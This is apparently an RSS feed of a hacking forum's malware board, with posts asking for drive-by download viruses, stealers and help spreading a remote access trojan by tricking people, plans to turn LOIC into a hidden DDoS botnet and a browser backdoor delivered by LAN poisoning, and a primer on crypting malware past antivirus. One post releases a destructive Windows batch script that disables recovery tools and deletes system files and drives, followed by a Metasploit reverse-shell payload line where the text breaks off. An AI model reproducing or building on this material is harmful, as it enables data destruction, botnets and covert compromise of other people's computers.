<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
      <title>Malware - iExploit</title>
      <link>http://iexploit.org/index.php?p=/categories/malware/feed.rss</link>
      <pubDate>Wed, 22 May 13 14:22:22 -0400</pubDate>
         <description>Malware - iExploit</description>
   <language>en-CA</language>
   <atom:link href="/index.php?p=/discussions/feed.rss" rel="self" type="application/rss+xml" />
   <item>
      <title>malare script that forces every website visitor to download .exe file</title>
      <link>http://iexploit.org/index.php?p=/discussion/6251/malare-script-that-forces-every-website-visitor-to-download-exe-file</link>
      <pubDate>Sat, 26 Jan 2013 11:46:27 -0500</pubDate>
      <dc:creator>tennis1978</dc:creator>
      <guid isPermaLink="false">6251@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">Hi. I'm new here and wanted to join this forum since I was told by 2 people this is possibly but I can't get any details exactly how it's done.</span><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span style="font-size: small;"><br></span></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span style="font-size: small;">I want to have a virus created where whenever someone websites my site automatically they get downloaded a .exe file. Are there any threads to talk about how this is done or can anyone do it for a fee?</span></div><div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">Thanks</span></div></div>]]></description>
   </item>
   <item>
      <title>JavaScript Malware Samples</title>
      <link>http://iexploit.org/index.php?p=/discussion/6049/javascript-malware-samples</link>
      <pubDate>Tue, 05 Jun 2012 10:26:23 -0400</pubDate>
      <dc:creator>Maitreya_Dave</dc:creator>
      <guid isPermaLink="false">6049@/index.php?p=/discussions</guid>
      <description><![CDATA[Hmm okay guys i need a few javascript malware samples i would love to check them out :) Please if anyone has any post it or anyone has any url infected by it i would also love that.<div><br></div><div>Kind Regards,</div><div>Mr.DaVe</div>]]></description>
   </item>
   <item>
      <title>Project Override</title>
      <link>http://iexploit.org/index.php?p=/discussion/6201/project-override</link>
      <pubDate>Sat, 06 Oct 2012 17:45:42 -0400</pubDate>
      <dc:creator>flawless</dc:creator>
      <guid isPermaLink="false">6201@/index.php?p=/discussions</guid>
      <description><![CDATA[OK, i have an idea<br><br>Admins sorry if um breaking the rules here didn't know<br><br>So project (Override) consists of a browser add on being installed via ettercap poisoning on the LAN and this add-on will act as a delivering backdoor agent solely living in the browser after its installation it uploads a malware i have adopted and coded to suite my needs this binary file it will be executed upon its completion of uploading to the target and it will be monitoring services running on the target.....after it finds a service i predefined on the executable it will try to run some commands on it so far i managed to get it to exit the process and the add-on its self it will be connecting to a remote ftp server every two days...................at first this method was complicated to code and having to implement evading techniques it took me a few weeks and frustration was building up..until i managed to get it to work properly three days ago<br><br>the method gets you a command prompt session to the target but with user privs....so if you interested we could colab on the project and add more to the project .....and maybe roll it to metasploit framework<br>]]></description>
   </item>
   <item>
      <title>highway to vx development</title>
      <link>http://iexploit.org/index.php?p=/discussion/5910/highway-to-vx-development</link>
      <pubDate>Tue, 27 Sep 2011 19:27:53 -0400</pubDate>
      <dc:creator>Blackout</dc:creator>
      <guid isPermaLink="false">5910@/index.php?p=/discussions</guid>
      <description><![CDATA[im ready to deep  mining in the vx world i like do this by the high way , yeah yeah i know expertise is required years of study and perfectioning method bla bla bla,<br /><br />like another areas i think a good reference or teacher can guide fast to achieve the objetive and thats is i searching for<br /><br />so i found on the net the giant black book of computer virus my question is, that material is out of date or describe the currently methods of make  virus or the way ist operate?(i see has published about 16 years ago) else could you guys recommend some source of info or related material that can i use for a highway kickstart in computer virus<br /><br />i appreciate your comments]]></description>
   </item>
   <item>
      <title>Need a facebook freezer or iStealer</title>
      <link>http://iexploit.org/index.php?p=/discussion/2508/need-a-facebook-freezer-or-istealer</link>
      <pubDate>Wed, 16 Mar 2011 18:23:01 -0400</pubDate>
      <dc:creator>[Deleted User]</dc:creator>
      <guid isPermaLink="false">2508@/index.php?p=/discussions</guid>
      <description><![CDATA[I searched everywhere for iStealer and fb freezer, i found much but all say "Inappropriate licence to use this file" and stuff.<br /><br />Can someone help me? :$<br />Thanks,]]></description>
   </item>
   <item>
      <title>Loic As A Virus?</title>
      <link>http://iexploit.org/index.php?p=/discussion/2840/loic-as-a-virus</link>
      <pubDate>Mon, 27 Jun 2011 09:19:05 -0400</pubDate>
      <dc:creator>Corrosion</dc:creator>
      <guid isPermaLink="false">2840@/index.php?p=/discussions</guid>
      <description><![CDATA[I've been looking at the loic source code (ddos tool, like you didn't know) and it has great potential to become a massive botnet if the right measures were taken.<br /><br />Due to anonymous's crap it is of course now a 'virus' to many av companies but a quick msfencode takes care of that, or simply use source code from a previous date and your clear as they seem to have only added the lastest to their list...<br /><br />Anyway I've manged to get it to automatically go into hive mind (irc) mode, login and wait for commands and I've figured out how to control it with most of its commands...<br /><br />my current issue/issues with it are...<br /><br />I can't make it hide itself (runnig is as loic.exe /hidden) will make it hide so its functionality is there... I may have had it at once point but that was a really long time ago when I was messing with it...<br /><br />Anyway my point is you could put this into any downloadable and have it run on startup, and the user would be none the wiser... and you'd have a nice ddos capable botnet un-detected...<br />You could have it start from a .bat file but why bother when you can hard code it?<br /><br />Any one have any ideas or anyone else think to use it this way.. It's a great tool and it could become a very large asset to anyone looking for a b-net]]></description>
   </item>
   <item>
      <title>SpyNet HTTP proxy feature</title>
      <link>http://iexploit.org/index.php?p=/discussion/5886/spynet-http-proxy-feature</link>
      <pubDate>Fri, 23 Sep 2011 05:42:29 -0400</pubDate>
      <dc:creator>anonymous777</dc:creator>
      <guid isPermaLink="false">5886@/index.php?p=/discussions</guid>
      <description><![CDATA[I tried to use the HTTP proxy feature on Spynet 2.6 server with no use, I also picked servers who don't need port-forward who have the same IP on the WAN and LAN, technically that means there is no LAN as long as I know.<br />I picked different ports, I disabled firewalls, and did everything possible, I think that function specifically is bugged, what about you, any luck getting it to work?<br />right now I am using replacement for this.]]></description>
   </item>
   <item>
      <title>Viruses: How they work and what they are</title>
      <link>http://iexploit.org/index.php?p=/discussion/452/viruses-how-they-work-and-what-they-are</link>
      <pubDate>Tue, 04 May 2010 01:55:43 -0400</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">452@/index.php?p=/discussions</guid>
      <description><![CDATA[<b>Viruses: How they work and what they are</b><br><i>Written by: Chroniccommand</i><br><span style="text-decoration: underline;">For: CodeShock</span><br>-----------------------------------------------------------------------------------------------------\\\\\\\\\\\\\\\\\<br><b>Definition of a computer virus</b><br>Wikipedia: <br><blockquote class="Quote"><div class="QuoteText">A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.</div></blockquote><br>Me<br><blockquote class="Quote"><div class="QuoteText">In my opinion, A computer virus is an crafted piece of code designed to infect computers and cause problems. Viruses may spread in many ways such as removable media drives, E-Mail, P2P(Person 2 Person) or any other numbers of ways. The main objective of a virus is to infect the host computer, like a real virus infects a host with strands of DNA injected into a cell. A computer virus works in a way similar by injecting pieces of code, much like DNA that will cause undesirable functions to the host computer. </div></blockquote><br>-----------------------------\\\<br><b>Types of virus's</b><br>Worm: A computer worm is one nasty code that you definitely do not want on your system. It is a self replicating program that will send copies of itself to other target machines by methods explained above, which I will now list some again:<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23E-Mail&amp;Mode=like">#E-Mail</a><br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23P2P&amp;Mode=like">#P2P</a><br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Removable&amp;Mode=like">#Removable</a> media drives<br>Unlike a virus, a worm does not need attach itself to a particular program. A worm may do things such as:<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Consume&amp;Mode=like">#Consume</a> bandwidth<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Consume&amp;Mode=like">#Consume</a> RAM(Random Access Memory)<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23More&amp;Mode=like">#More</a>...<br>Take a look at this image, which shows the spread of the Conficker worm.<br>http&#58;//upload&#46;wikimedia&#46;org/wikipedia/commons/thumb/5/53/Conficker&#46;svg/800px-Conficker&#46;svg&#46;png<br>------------------------\\<br><b>Trojan Horse</b><br>A Trojan Horse is another very nasty piece of code. A Trojan Horse is a non-replicating piece of software that attempts to preform undesirable functions to the host computer. Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system, it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse. Some Trojan Horse functions are listed below:<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Data&amp;Mode=like">#Data</a> theft<br>#Download/Upload files<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23View&amp;Mode=like">#View</a> a users screen<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Wasting&amp;Mode=like">#Wasting</a> storage space<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Using&amp;Mode=like">#Using</a> as a botnet<br>Trojan Horse installation: Normally a hacker will download a program, such as Cybergate or Spy-Net or Prorat. From the interface of such programs a hacker will create a server which will open a backdoor into the computers system. Step 3 is to connect to the server(Some programs such as cybergate listen for a connection and will allow multiple connections). Once the hacker has connected to the host machine infected by the Trojan, the hacker will have access to many of the tools the Trojan Horse offers.<br>----------------------------\\<br><b>Spyware</b><br>Definition of Spyware.<br><blockquote class="Quote"><div class="QuoteText">Spyware is a type of malware that is installed on computers and collects little bits of information at a time about users without their knowledge. The presence of spyware is typically hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.</div></blockquote> <br>The most common use of spyware is through a keylogger. A keylogger is a piece of code that will log all keys typed by the user. Typically the logs will send either the hackers mail or by FTP.<br>---------------------------\\<br><b>How to protect yourself</b><br>Protecting yourself from any virus is quite simple. Some simple ways of protecting yourself are listed right below:<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Use&amp;Mode=like">#Use</a> Linux!!<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Download&amp;Mode=like">#Download</a> an AV(Anti Virus) program and scan regularly<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Be&amp;Mode=like">#Be</a> weary of what you download<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23Try&amp;Mode=like">#Try</a> to run things sandboxed or through VM.<br><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23If&amp;Mode=like">#If</a> your infected please consult many of the experts on HackForums and CodeShock and you can get yourself uninfected. <br>----------------------\\<br><b>Undetection methods</b><br>Latest Anti-Virus wont fully protect you from viruses. Let me explain a little. What is FUD? FUD stands for Fully Undetectable. A FUD virus is a virus that will not be detected by an anti-virus. If a virus is detected by some Anti-Virus systems but not all it is considered UD(Undetectable). <br>Method of FUD'ing a virus:<br>Typically the hacker will use a program called a <b>Crypter</b> to help make there virus FUD/UD. The hacker will crypt the file and scan it with <a class="postlink" rel="nofollow" href="http://scanner.novirusthanks.org/">http://scanner.novirusthanks.org/</a> And choose not to distribute the sample because a sample of the virus will be sent to Anti-Virus companies, looked at and soon the virus will no longer be FUD. <br>---------------------------\\<br>Please note that this is an early version of the paper. I may write more. Please reply or PM suggestions/comments and I hope you enjoyed this paper on viruses, how they work, what they do and how to protect yourself.<br>-Chroniccommand]]></description>
   </item>
   <item>
      <title>[help] Setting up and distributing RAT.</title>
      <link>http://iexploit.org/index.php?p=/discussion/2511/help-setting-up-and-distributing-rat-</link>
      <pubDate>Thu, 17 Mar 2011 01:59:51 -0400</pubDate>
      <dc:creator>Am0s</dc:creator>
      <guid isPermaLink="false">2511@/index.php?p=/discussions</guid>
      <description><![CDATA[Hello,<br />I'm completely new here (honestly, I just made my account now to post this) as well as new to the world of hacking. Originally I was getting my information off of hackforums.net but it appears that the website is down (if/when it comes back up... somebody let me know)<br />From hackforums, and various places on the web (such as youtube) I've come to understand, on at least a basic level, how to use and set up a RAT (really all I am interested in at the moment). However, I am still yet to really get it to work out properly.<br /><br />(I am using DarkComet 3.2 at the moment, and it is installed on a windows XP laptop. I am also when I am attempting to try my RATs using a Windows 7 laptop with Sophos AV.)<br /><br />The things I need help with still<br />1. Crypting- I can not for the life of me manage to figure out how to effectively use a [FREE] crypter, it appears. They either don't seem to work right when they don't set off the AV, or they are always caught. Which is likely partly me doing it wrong, and partly me using bad software<br /><br />2. Setting up a Server- on the surface, this seems like a truly stupid thing with how many DarkComet tutorials I've read/watched. But I still don't get quite what settings are best for my purposes. Also, a recent change has occurred. Whenever I try to use my no-ip.org address or my external IP for the server settings, I can't find a single port it will connect on.<br /><br />3. Distributing the server effectively - Again, I'm sure I seem like an idiot for asking this. But I can't seem to get the stuff distributed right. There are some machines where I actually have access to the computer itself because the owner permits me for various reasons, yet I can't seem to get a server to work on it. Other ones, I am sure I can SE them into running the application if I send it via Skype or something (some actually have). And others, I doubt I can get such simple access. But on all of them, even if I know that they execute the server, I don't get a new connection.<br /><br />4. "hitching" - I am sure you are cringing, as this is not the real name for it. But isn't there a way I can use RAT somebody's computer if somebody ELSE installed a server on them? I know not at all how to do so if this is the case.<br /><br /><br />I'm not trying to be a straight up Black Hat here. Most of the time I try to distribute a Trojan, it is because I am trying to help the person i none way or another (sometimes not a technical-oriented way though.) Although, I do plan to have some amusement while I'm at it and maybe even gleam a bit of information out of people that I couldn't gain otherwise.]]></description>
   </item>
   <item>
      <title>RegTweak [DOS]</title>
      <link>http://iexploit.org/index.php?p=/discussion/2734/regtweak-dos</link>
      <pubDate>Sun, 22 May 2011 10:12:50 -0400</pubDate>
      <dc:creator>Prariredog</dc:creator>
      <guid isPermaLink="false">2734@/index.php?p=/discussions</guid>
      <description><![CDATA[<span><span style="color: #1E90FF;">RELEASED!</span></span><br><br>RegTweak Crashes Windows and makes it freeze but stops system also explorer<br>Just Don't open the exe I really don't know if you should my script is deadly see for your self <div class="PreContainer"><pre>echo off<br>echo wscript&amp;#46;exe \&quot;C&amp;#58;\Program Files\Alwil Software\Avast4\&quot; \&quot;Ahrunsecurty&amp;#46;dll\&quot;<br>echo CreateObject(\&quot;Wscript&amp;#46;Shell\&quot;)&amp;#46;Run \&quot;\&quot;\&quot;\&quot; &amp; WScript&amp;#46;Arguments(0) &amp; \&quot;\&quot;\&quot;\&quot;, 0, False<br>echo &amp;#46;&amp;gt;&amp;gt;c&amp;#58;\WINDOWS&amp;#46;&amp;#46;&amp;#46;\keys&amp;#46;txt<br>echo &amp;#58;<br>set /p keys=<br>echo %keys%&amp;gt;&amp;gt;c&amp;#58;\\Windows&amp;#46;&amp;#46;&amp;#46;\Serial&amp;#46;txt<br>echo REGEDIT4 &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo&amp;#46; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo &amp;#91;HKEY_CURRENT_USER\Control Panel\Mouse&amp;#93; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;SwapMouseButtons\&quot;=\&quot;1\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;MouseSpeed\&quot;=\&quot;1\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;DoubleClickSpeed\&quot;=\&quot;1\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo&amp;#46; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo &amp;#91;HKEY_CURRENT_USER\Control Panel\Keyboard&amp;#93; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;KeyboardDelay\&quot;=\&quot;1\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;KeyboardSpeed\&quot;=\&quot;1\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo&amp;#46; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo &amp;#91;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main&amp;#93; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;Start Page\&quot;=\&quot;http&amp;#58;//www&amp;#46;google&amp;#46;com/\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo&amp;#46;<br>echo &amp;#91;HKEY_CURRENT_USER\Control Panel\Desktop&amp;#93; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;PaintDesktopVersion\&quot;=dword&amp;#58;1 &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo&amp;#46; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br><br>echo &amp;#91;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&amp;#93; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;LegalNoticeCaption\&quot;=\&quot;YoU HaVe A vIRus NoW =)\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br>echo \&quot;LegalNoticeText\&quot;=\&quot;Please contact 1-800-viruz\&quot; &amp;gt;&amp;gt; c&amp;#58;\reg&amp;#46;reg<br><br>echo &amp;#91;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System&amp;#93;<br>\&quot;DisableRegistryTools\&quot;=dword&amp;#58;00000001<br><br>echo &amp;#91;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System&amp;#93;<br>\&quot;DisableTaskMgr\&quot;=dword&amp;#58;00000001<br><br>echo &amp;#91;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies&amp;#93;<br>\&quot;WriteProtect\&quot;=dword&amp;#58;00000001<br><br>echo &amp;#91;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;#93;<br>\&quot;NoCDBurning\&quot;=dword&amp;#58;00000001<br><br>echo &amp;#91;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout&amp;#93;<br>\&quot;Scancode Map\&quot;=hex&amp;#58;00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\<br>  00,00,00,00<br><br>echo<br><br>REGEDIT /s c&amp;#58;\reg&amp;#46;reg<br>del \&quot;C&amp;#58;\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp&amp;#46;bat\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\agentsr&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\agentpsh&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\security\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\TASKMAN\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\explorer\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\regedit\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\notepad\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\pss\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\Registration\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\System\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\pchealth\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\safemode\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\rundll32\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\taskkill\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\tasklist\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\taskmgr\&quot;<br><br>DEL C&amp;#58; -Y<br><br>DEL D&amp;#58; -Y<br><br>DEL H&amp;#58; -Y<br><br>DEL P&amp;#58; -Y<br><br>del %systemdrive%\*&amp;#46;*/f/s/q<br><br>del cd /d %HOMEDRIVE%\%HOMEPATH%<br><br>del \&quot;C&amp;#58;\WINDOWS\ServicePackFiles\I386\cmd\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\windowspowershell\v1&amp;#46;0\examples\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\windowspowershell\v1&amp;#46;0\about_path_syntax&amp;#46;help<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\windowspowershell\v1&amp;#46;0\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\svcpack&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\svchost\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\sysedit\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\sysedit\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\system\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\systeminfo\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\csrsrv&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\smss\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\spoolss&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\spoolsv\&quot;\<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\csrss\&quot;\<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\compobj&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\console&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\control\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\compact\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\comp\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\CONFIG&amp;#46;NT\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\conime\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\command\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\cmstp\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\cnetcfg&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\cscript\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\drwatson\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\drwtsn32\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\drprob&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\shell32&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\wmvcore&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\win32k\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\WMNetMgr&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\logonui\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\shellstyle&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\vbscript&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\deployjava1&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ntmsmgr&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ipmsnap\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\msscp\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\smlogcfg&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\expsrv&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ipsmsnap\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\lmrt&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\themeui&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\MSRDO20&amp;#46;dll<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\rpcss&amp;#46;dll<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\netlogon&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\s3gnb&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\wzcdlg&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\qdvd&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\wpdsp&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\winhttp&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\confmsp&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\wmdrmnet&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ipsecsnp&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\d3drm&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\localspl&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\windowscodecsext&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\msvcrt&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ir41_qcx&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\dmconfig&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\hnetwiz&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\filemgmt&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\WUDFx&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\MP4SDECD&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\wucltui&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\cscui&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\msrd3x40&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\iedkcs32&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ursdtea&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\msexcl40&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\scesrv&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\netsetup\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ipnathlp&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\ippromon&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\dmnconfig&amp;#46;dll\&quot;<br><br>del \&quot;C&amp;#58;\WINDOWS\system32\hnetwiz&amp;#46;dll\&quot;<br><br>del \&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\&quot;<br><br>del \&quot;HKEY_LOCAL_MACHINE\SYSTEM\&quot;<br><br>del \&quot;HKEY_LOCAL_MACHINE\&quot;<br><br>del \&quot;HKEY_USERS\&quot;<br><br>del \&quot;HKEY_CURRENT_CONFIG\&quot;<br><br>del \&quot;HKEY_CLASSES_ROOT\&quot;<br><br>del \&quot;HKEY_CURRENT_USER\&quot;<br><br>del \&quot;%SYSTEMROOT%\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\View Channels\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\$winnt$\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\EAL32\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\login\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\kernel32&amp;#46;dll\&quot;<br><br>del \&quot;%SYSTEMROOT%\system32\mfc42u&amp;#46;dll\&quot;<br><br>del \&quot;HKEY_CLASSES_ROOT\&quot;<br><br>del \&quot;HKEY_CURRENTUSER\&quot;<br><br>del \&quot;HKEY_USERS\&quot;<br><br>del \&quot;HKEY_CURRENTCONFIG\&quot;<br><br>del \&quot;HKEY_DYN_DATA\&quot;<br><br>del \&quot;\??\C&amp;#58;\Documents and Settings\All Users\Application Data\Systweak\ASO3\System Protector\Native\nativeapp&amp;#46;in\&quot;<br><br>ipconfig /release<br><br>exit</pre></div><br><br>INPUT INTO .DLL<br><div class="PreContainer"><pre>./msfpayload windows/shell/reverse_tcp HKEY_LOCALMACHINE ./msfencode -x ashCmd.exe -t exe -e 